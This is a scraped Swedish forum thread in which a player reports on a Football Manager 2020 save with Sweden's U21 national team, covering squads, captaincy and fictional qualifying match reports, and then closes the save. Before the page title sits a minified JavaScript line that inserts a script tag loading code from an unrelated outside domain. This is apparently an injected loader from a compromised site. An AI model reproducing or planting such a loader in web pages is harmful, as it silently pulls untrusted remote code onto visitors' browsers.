;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); [FM20] Framtiden är vår, Sverige u21 – Avslutade rapporter – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

[Stängt] [FM20] Framtiden är vår, Sverige u21

6 Inlägg
1 Users
4 Reactions
813 Visningar
(@marsun19)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 46
Topic starter  

              Framtiden är vår

 

Jag har valt att starta en save med Sveriges u21 landslag. Jag har laddat alla ligor men tagit alla ligor som visa endast förutom Sveriges ligor där det vissas. Målet med denna save är att köra så långt som mögligt tills FM21 släpps. 

 

Frågor om hur denna save kommer vara:

Hur kommer jag skriva? Jo, jag är inne på att skriva efter varje landslagsamling. 

Kommer du ta ut truppen själv? Ja, från början men tills det kommer massa regens låter jag ass förbundskapten ta ur truppen.

Kommer du spela matcherna själv? Ja jag kommer det även landskamperna.

Sista frågan. Hur långt tror du kan ta Sveriges u21 lag? Jag hoppas på att ta ett U21 guld men målet är att kvala in till alla EM mästerskap.

 

Formationen?

En 4-2-3-1 som vi kommer börja med. Vi vill vinna alla matcher och det ska vi göra med denna formation.

 

Kapten? Jag har inte bestämt en kapten än men jag har några alternativ på en kapten. Men det ska vara klart till första trupputagningen.

 

Hoppas ni hänger med på denna resa. 

 

Forza Sverige

Klart: Här är Sveriges grupp i U21-EM-kvalet - ställs mot Italien


   
JOSSTICK and Micke reacted
(@marsun19)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 46
Topic starter  

Första landslagstruppen skulle tas ut. Landskamper mot Österrike och Kazakstan. Truppen såg ut som följande:

Och efter några dar som kom ett besked att Irandust har skadat sig och kan inte vara med och då kom denna grabb in.

 

Kaptenen skulle väljas och här är svaret:

Kommentar om Pontus som kapten: Pontus är en grabb som är vår förstemålvakt och kommer stå i kvalet. Pontus är en av dom viktigaste och han fick bindeln då.

Kommentar om Mattias: Mattias kunde lika väl har fått bindeln men har får bli vår vice.

 

Laguppställningen mot Österrike:

På Stadion Hartberg i Österrike var det 3087 åskådare. Vilket är bra för att vara en landskamp. Matchen börjar med Svensk press. Sverige gå offensivt direkt. Och då lönar det sig i den 8 minuten när Max Svensson skjuter in 1-0. Sverige fortsatte med hög press. Österrike hade sina chanser men tog inte vara på dom. Resultatet skulle stå sig ända till 57 minuten då Jesper Karlsson kommer loss från sin markering och kunnde enkelt placera in 2-0. Nu så gick vi ner på tempot. Österrike gjorde några byten och försökte göra ett mål. Men i minut 70 skulle Alexander Jallow sätta spiken i kistan och game over för Österrike och 3-0 var ett faktum. Båda lagen ville bara spela ut matchen nu och till slut efter att klockan stannade på 92 så var segern ett faktum.

 

Laguppställningen mot Kazakstan:

Stadsparksvallen var det 2767 i publiken. En match som Sverige var favoriter. 1-0 skulle komma i 34 minuten av Joel Asoro. John Björkengren skulle senare göra 2-0 i minut 37. Halvtiden skulle det stå 2-0. Det skulle inte var någon måltorka för Björkengren han skulle på egen hand göra 3-0 i 48 minuten. Resultatet skulle stå sig ända tills 72 minuten då Gyökeres skulle göra 4-0. 84 minuten skulle Nygren bli nedsparkad i straffområdet och straff var det signalerat från domaren. Vem skulle gå fram? Jo John Björkengren var det och 5-0 var ett faktum. 5-0 vart resultatet.

 

Denna landslagsamling var på toppen från spelarna.

Nästa samling är mot Montenegro i juli en landskamp.

 

Forza Sverige

Klart: Här är Sveriges grupp i U21-EM-kvalet - ställs mot Italien


   
(@marsun19)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 46
Topic starter  

Montenegro var nästa motståndare. Denna samling var den sista innan EM kvalet börjar. Truppen såg ut som följande:

 

Inga stora förändringar men vissa bland annat Elanga och Gwargis. Vi i ledarstaben pratade med Dahlberg och sa "Du kommer inte få spela men finnas med på bänken då vi vill se vad Rönning och Joelsson går för." Dahlberg tog det positivt. Resten i gruppen fick veta att alla skulle få spela 45 min var förutom Dahlberg som inte kommer spela.

 

Dom här spelade den första halvleken:

Tunavallen var spelplatsen. Där 3047 åskådare hade kommit denna fina sommarkväll. Där redan i minut 1 eller snarare 37 sekunder in i matchen så kom Nils Fröling fri och la in 1-0 kyligt. Det skulle bli bättre när August Erlingmark sköt ett skott utanför straffområdet och 2-0 var ett faktum redan i minut 4. Och direkt efter så snodde Sverige bollen och Fröling la in 3-0 i 5:e minuten. Pausvilan skulle vissa 3-0.

11 byten skulle göras nu av Sverige och dessa fick komma in.

En halvlek som skulle vara jämn. Ingen bjöd på någon show. Minut 61 så skulle Gwargis lägga in 4-0. Matchen slutade 4-0 och Sverige bjöd på show i första men inte i andra.

 

Denna landslagsamling var godkänd men det var bara en träningsmatch. Nästa gång så är det dags för u21 EM-kval.

Gruppen ser ut så här:

Där vi och Schweiz kommer slås om 2 platsen och playoff platsen. Spanien bör komma 1.

 

Forza Sverige

Klart: Här är Sveriges grupp i U21-EM-kvalet - ställs mot Italien


   
(@marsun19)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 46
Topic starter  

Jaha då var det dags för U21 EM-kval. En grupp som är följande:

Denna trupp såg ut så här

Ett glädjebesked för U21 var att Janne valde att peta Dejan och vi tog honom. Medan Janne tog in Jesper Karlsson.

Samtidigt som Gais sparkar sin tränare så tar våran ass förbundskapten Bartosz Grzelak över som Gais tränare. Det betydde att vi inte hade någon ass förbundskapten men till slut så valde vi att gå på Tobias Linderoth.

 

Första matchen var mot Spanien. Dom här fick spela mot Spanien:

Till Vångavallen kom det 4506 åskådare. Där Svenska fansen skulle jubla högst redan 5 minuter in i matchen. Då Nils Fröling chippade in bollen i mål och 1-0 var ett faktum. Det skulle inte ta länge innan nästa mål skulle komma av Svante Ingelsson 2-0 med bara 9 minuter spelad. Vart skulle det här sluta? Nästa mål skulle komma i matchminut 32 av August Erlingmark. Halvtiden så skulle det stå 3-0 till Sverige. När andra halvleken startade så var det ett hungrigt Spanien som pressade. Men Sverige stog bra emot. Nils Fröling skulle göra sitt andra mål i den 63 minuten och Sverige lekte med Spanien och 4-0 var ett faktum på Vångavallen denna kväll. Matchen skulle sluta 4-0.

 

Nu Väntade San Marino på bortaplan. Dom som spelade var dom här:

På San Marino Stadium var det 689 åskådare. En match som Sverige öppnade starkt. Redan i den 4 minuten var Dejan Kulusevski framme och gjorde 1-0. 4 minuter senare skulle Max Svensson göra 2-0. 3-0 skulle komma i minut 10 av Jack Lahne. Minut 15 skulle Dejan göra 4-0. Sen så skulle Dejan göra sitt 3: mål i matchen och 5-0 för Sverige i minut 24. 6-0 skulle komma i minut 31 av Felix Beijmo. 7-0 skulle Dejan göra i minut 44. Halvtiden stog det 7-0. Precis 4 minuter senare efter andra halvleken hade kört igång så gjorde Max Svensson 8-0. 9-0 skulle komma i minut 69 av Rasmus Wikström. Och sen kommer han som var kungen ikväll Dejan Kulusevski som gjorde 10-0 i minut 77 och 5 mål av Dejan. Matchen slutadr 10-0.

 

Denna samling var supergrym speciellt med seger över Spanien och San Marino.

 

Tabellen:

 

Forza Sverige

Klart: Här är Sveriges grupp i U21-EM-kvalet - ställs mot Italien


   
(@marsun19)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 46
Topic starter  

Vi går på rak på sak.

Truppen såg ut som följande:

Och precis en dag senare så kom ett besked att Hadzikadunic och Cajuste har blivit skadad och kan inte vara med. In kom

 

Bulgarien var det dags för. Dom som spelade var dom här:

På Örjans Vall var det 3087 i publiken. Det skulle bara gå 5 minuter innan Nils Fröling och Sverige gjorde 1-0. En snygg chipp av Fröling. En match som inte hade så mycket att bjuda på. Men i minut 17 så gör Nils Fröling sitt andra mål för kvällen och 2-0 för Sverige. 2 minuter senare så skulle Mattias Svanberg göra 3-0 med ett hårt skott upp i krysset. 4-0 skulle komma i den 36 minuten av Rasmus Wikström efter att Sverige fått en hörno så var han framme och nickade in. Pausvilan skulle det stå 4-0. En andra halvlek som inte skulle visa något inget hände matchen slutade 4-0. Men det enda som nästan man kommer ihåg från den halvleken är 55 minuten då Jesper Karlsson gör illa sig och efter några timmar så kom detta besked efter matchen.

Vi i ledarstaben valde att inte drafta in någon.

 

Match mot Nordmakedonien. Dom här spelade:

Vi valde en liten mer "B-lag" då jag ville se hur dom spelar under en tävlingsmatch.

 

På Toshe Proeski National Arena fanns det 3494 åskådare. I minut 22 så skulle Nordmakedoniens Goran Kitanoski få direkt rött kort efter en tackling med sträckt sula. Det skulle vara mållöst till den 28 minuten då Viktor Gyökeres gör 1-0. 1-0 skulle stå sig i halvtiden. Det skulle stå ända till 63 minuten. Då August Erlingmark gjorde 2-0 med ett snyggt skott. 3-0 skulle komma i den 78 minuten av Jack Lahne. Efter att han kom fri kunde han lägga in 3-0. Matchen skulle sluta 3-0.

 

Efter 4 matcher i U21 EM-kvalet har Sverige 12 poäng av 12 poäng. Sverige har gjort 21 mål med 0 insläppta.

 

Tabellen:

 

Forza Sverige

Klart: Här är Sveriges grupp i U21-EM-kvalet - ställs mot Italien


   
(@marsun19)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 46
Topic starter  

Hej!

Jag kommer lägga ner denna saverapport. Så någon kan gärna låsa denna saverapport.


   
Share: